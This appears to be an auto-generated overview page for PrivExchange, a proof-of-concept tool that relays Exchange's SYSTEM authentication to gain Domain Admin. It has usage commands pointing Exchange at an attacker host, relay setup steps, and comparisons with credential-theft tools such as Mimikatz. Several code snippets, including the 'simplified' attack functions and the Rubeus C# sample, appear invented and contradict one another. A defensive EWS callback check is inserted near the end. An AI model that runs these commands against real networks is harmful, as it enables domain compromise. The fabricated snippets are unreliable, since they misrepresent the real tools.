dirkjanm/PrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange


Quick Overview

PrivExchange is a proof-of-concept tool designed to exploit a vulnerability in Microsoft Exchange servers. It allows an attacker with a low-privileged domain account to gain Domain Admin privileges by abusing Exchange's delegation rights. This tool demonstrates the potential security risks associated with misconfigured Exchange servers in Active Directory environments.

Pros

  • Highlights a critical security vulnerability in Exchange server configurations
  • Provides a practical demonstration of privilege escalation techniques
  • Useful for security researchers and penetration testers to assess Exchange security
  • Raises awareness about the importance of proper Exchange server configuration

Cons

  • Can be misused by malicious actors if not handled responsibly
  • Requires access to a domain account, limiting its applicability in some scenarios
  • May not work on patched or properly configured Exchange servers
  • Could potentially cause unintended disruptions if used improperly

Code Examples

# Example 1: Setting up the relay
relay = SMBRelayServer(args.relay, args.attackerip)
relay.start()

This code initializes the SMB relay server, which is crucial for the attack.

# Example 2: Performing the NTLM relay attack
httpattack = HTTPAttack(args.target, args.username, args.password, args.domain, args.hashes, args.attackerip, args.exchangemailbox, args.ssl)
httpattack.run()

This snippet executes the NTLM relay attack against the target Exchange server.

# Example 3: Cleaning up after the attack
print('[*] Cleaning up...')
conn = LDAP(args.target, get_user_info=False, authentication=NTLM)
conn.login(args.username, args.password, args.domain, args.hashes)

This code performs cleanup operations after the attack, including logging into the target LDAP server.

Getting Started

To use PrivExchange:

  1. Clone the repository:

    git clone https://github.com/dirkjanm/PrivExchange.git

  2. Install dependencies:

    pip install -r requirements.txt

  3. Run the tool:

    python privexchange.py -ah [attacker_ip] -u [username] -d [domain] [target_exchange]

Note: Use this tool responsibly and only on systems you have permission to test.

Competitor Comparisons

PowerShell-Suite (My musings with PowerShell)

Pros of PowerShell-Suite

  • Broader scope: Offers a comprehensive collection of PowerShell scripts for various security tasks
  • More versatile: Can be used for multiple purposes beyond privilege escalation
  • Active development: Regularly updated with new scripts and features

Cons of PowerShell-Suite

  • Less focused: Not specifically tailored for Exchange privilege escalation like PrivExchange
  • Steeper learning curve: Requires more time to understand and utilize the diverse set of tools
  • Potentially more complex setup: May need additional dependencies for certain scripts

Code Comparison

PrivExchange (Python):

def exploit(args):
    # [...]
    dce = get_dce_rpc(args.target, args.username, args.password, args.domain)
    # [...]

PowerShell-Suite (PowerShell):

function Invoke-MS16-032 {
    [CmdletBinding(DefaultParameterSetName='Cmd')]
    param(
        [String]$Command = "cmd.exe /c whoami /all"
    )
    # [...]
}

The code snippets show that PrivExchange is written in Python and focuses on Exchange-specific exploitation, while PowerShell-Suite uses PowerShell and offers a wider range of security-related functions.

Impacket (a collection of Python classes for working with network protocols)

Pros of Impacket

  • Broader scope: Impacket is a comprehensive collection of Python classes for working with network protocols, offering a wide range of tools and functionalities beyond just Exchange server exploitation
  • Active development: Impacket is regularly updated and maintained, with a large community of contributors
  • Extensive documentation: Provides detailed explanations and examples for using its various modules and tools

Cons of Impacket

  • Steeper learning curve: Due to its extensive feature set, Impacket may require more time to master compared to the more focused PrivExchange
  • Larger codebase: The comprehensive nature of Impacket results in a larger and more complex codebase, which may be overwhelming for users seeking a specific functionality

Code Comparison

PrivExchange (exploit.py):

def exploit(args):
    # Exploitation logic specific to Exchange server vulnerability
    # ...

Impacket (exchanger.py):

class ExchangeRelayClient:
    def __init__(self, target, username, password, domain):
        # Initialize Exchange client with more flexible options
        # ...

The code snippets illustrate that PrivExchange is more focused on a specific exploit, while Impacket provides a more versatile and extensible framework for working with Exchange and other network protocols.

PowerSploit - A PowerShell Post-Exploitation Framework

Pros of PowerSploit

  • Broader scope: Offers a comprehensive suite of post-exploitation tools
  • Extensive documentation and community support
  • Regular updates and contributions from multiple developers

Cons of PowerSploit

  • Larger footprint: May be more easily detected by security software
  • Requires PowerShell execution, which might be restricted in some environments
  • More complex to use for specific tasks compared to PrivExchange

Code Comparison

PrivExchange (Python):

def exploit(args):
    if args.attacker_port is None:
        args.attacker_port = 80
    # ... (exploit code)

PowerSploit (PowerShell):

function Invoke-Mimikatz
{
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
        [Alias('Module')]
        [ValidateSet('sekurlsa','kerberos','crypto','vault','process','service','lsadump','ts','event','misc','privilege','sid','token','cache')]
        [String[]]
        $Command = 'sekurlsa::logonpasswords'
    )
    # ... (function implementation)
}

The code comparison shows that PrivExchange is more focused on a specific exploit, while PowerSploit provides a broader range of functionalities with more complex command structures.

Rubeus (Trying to tame the three-headed dog)

Pros of Rubeus

  • More versatile tool for Kerberos ticket manipulation and attacks
  • Actively maintained with regular updates and new features
  • Supports a wider range of Kerberos-related operations

Cons of Rubeus

  • More complex to use, requiring deeper understanding of Kerberos
  • Primarily focused on Windows environments
  • Larger codebase, potentially more challenging to audit

Code Comparison

PrivExchange (Python):

def exchange_attack(self, host, username, password, domain):
    # Simplified attack logic
    self.connect(host)
    self.authenticate(username, password, domain)
    self.perform_exchange()

Rubeus (C#):

public static void PerformKerberosAttack(string target, string user, string password)
{
    // Simplified attack logic
    var ticket = RequestTicket(target, user, password);
    ManipulateTicket(ticket);
    UseTicket(ticket);
}

While PrivExchange focuses specifically on exploiting Exchange servers, Rubeus offers a broader set of Kerberos-related functionalities. PrivExchange is simpler to use for its specific purpose, while Rubeus provides more flexibility but requires more expertise. The code snippets illustrate the difference in approach and complexity between the two tools.

Mimikatz (A little tool to play with Windows security)

Pros of Mimikatz

  • More comprehensive toolkit for Windows credential extraction and manipulation
  • Supports a wider range of attack vectors and techniques
  • Actively maintained with frequent updates and new features

Cons of Mimikatz

  • Larger footprint and more complex to use
  • More likely to be detected by antivirus software
  • Requires administrative privileges for most operations

Code Comparison

PrivExchange (Python):

def exchange_attack(target, attacker, exchange, username, password, domain, auth):
    # Simplified attack logic
    print("[*] Attacking %s as %s\\%s" % (exchange, domain, username))
    # ... (attack implementation)

Mimikatz (C):

NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
{
    LPCWSTR szUser = NULL, szGuid = NULL, szDc = NULL;
    DWORD dwFlags = 0;
    // ... (DCSync implementation)
}

PrivExchange focuses on a specific Exchange Server vulnerability, while Mimikatz offers a broader range of credential manipulation techniques. PrivExchange is written in Python, making it more accessible for scripting and integration, whereas Mimikatz is written in C for lower-level system access and performance. PrivExchange is generally easier to use for its specific purpose, while Mimikatz provides more flexibility but requires more expertise to utilize effectively.

BloodHound-Legacy (Six Degrees of Domain Admin)

Pros of BloodHound-Legacy

  • More comprehensive Active Directory reconnaissance tool
  • Visualizes attack paths and relationships in AD environments
  • Actively maintained with a larger community and support base

Cons of BloodHound-Legacy

  • More complex setup and usage compared to PrivExchange
  • Requires more resources and time to run full analysis
  • May generate more noise in the network, potentially triggering alerts

Code Comparison

BloodHound-Legacy (PowerShell):

Import-Module .\BloodHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\BloodHound

PrivExchange (Python):

python privexchange.py -ah attacker-hostname.com exchange-server.domain.com

BloodHound-Legacy takes a more comprehensive approach to Active Directory analysis, providing visual representations of attack paths and relationships, and is actively maintained by a larger community. It is more complex to set up and use than PrivExchange, which focuses specifically on exploiting Exchange privileges, and its collection may generate more network traffic and trigger alerts. PrivExchange, being more targeted, is simpler to use but narrower in scope. The code comparison shows the difference in complexity: BloodHound-Legacy requires a module import and more parameters, while PrivExchange has a simpler command-line interface.

README

PrivExchange

POC tools accompanying the blog Abusing Exchange: One API call away from Domain Admin.

Requirements

These tools require impacket. You can install it from pip with pip install impacket, but it is recommended to use the latest version from GitHub.

privexchange.py

This tool simply logs in to Exchange Web Services and subscribes to push notifications. This makes Exchange connect back to you and authenticate as SYSTEM.
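As an added, defender-side example (not code from PrivExchange or from the accompanying blog post), the following Python inspects an EWS Subscribe request body and flags push-subscription callback URLs whose host is not an expected Exchange host, the kind of check a reverse proxy or log-replay script could apply; the SOAP sample and host names are constructed.

```python
# Added example (not part of PrivExchange): find push-notification callback
# URLs in an EWS Subscribe request and flag hosts outside an allowlist.
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# EWS namespaces as documented by Microsoft for the Subscribe operation.
NS = {
    "s": "http://schemas.xmlsoap.org/soap/envelope/",
    "m": "http://schemas.microsoft.com/exchange/services/2006/messages",
    "t": "http://schemas.microsoft.com/exchange/services/2006/types",
}

# Constructed sample: a push subscription whose callback host is a
# workstation rather than an Exchange server (hypothetical names).
SAMPLE_SUBSCRIBE = """<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
    xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types">
  <s:Body>
    <m:Subscribe>
      <m:PushSubscriptionRequest>
        <t:FolderIds><t:DistinguishedFolderId Id="inbox"/></t:FolderIds>
        <t:EventTypes><t:EventType>NewMailEvent</t:EventType></t:EventTypes>
        <t:StatusFrequency>1</t:StatusFrequency>
        <t:URL>http://workstation17.example.local/push/</t:URL>
      </m:PushSubscriptionRequest>
    </m:Subscribe>
  </s:Body>
</s:Envelope>"""


def extract_push_urls(soap_body):
    """Return every push-subscription callback URL found in a Subscribe body."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return []  # not XML at all: nothing to inspect
    urls = root.iterfind(".//m:PushSubscriptionRequest/t:URL", NS)
    return [u.text.strip() for u in urls if u.text]


def flag_unexpected_callbacks(soap_body, allowed_hosts):
    """Return callback URLs whose host is not an allowed Exchange host."""
    allowed = {h.lower() for h in allowed_hosts}
    return [u for u in extract_push_urls(soap_body)
            if (urlsplit(u).hostname or "").lower() not in allowed]
```

Exchange will call whatever URL the subscriber supplies, so comparing the callback host against the servers that legitimately receive push notifications is a cheap way to surface subscriptions that point at an arbitrary internal host.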

httpattack.py

Attack module that can be used with ntlmrelayx.py to perform the attack without credentials. To get it working:

  • Modify the attacker URL in httpattack.py to point to the attacker's server where ntlmrelayx will run
  • Clone impacket from GitHub: git clone https://github.com/SecureAuthCorp/impacket
  • Copy this file into the /impacket/impacket/examples/ntlmrelayx/attacks/ directory.
  • cd impacket
  • Install the modified version of impacket with pip install . --upgrade or pip install -e .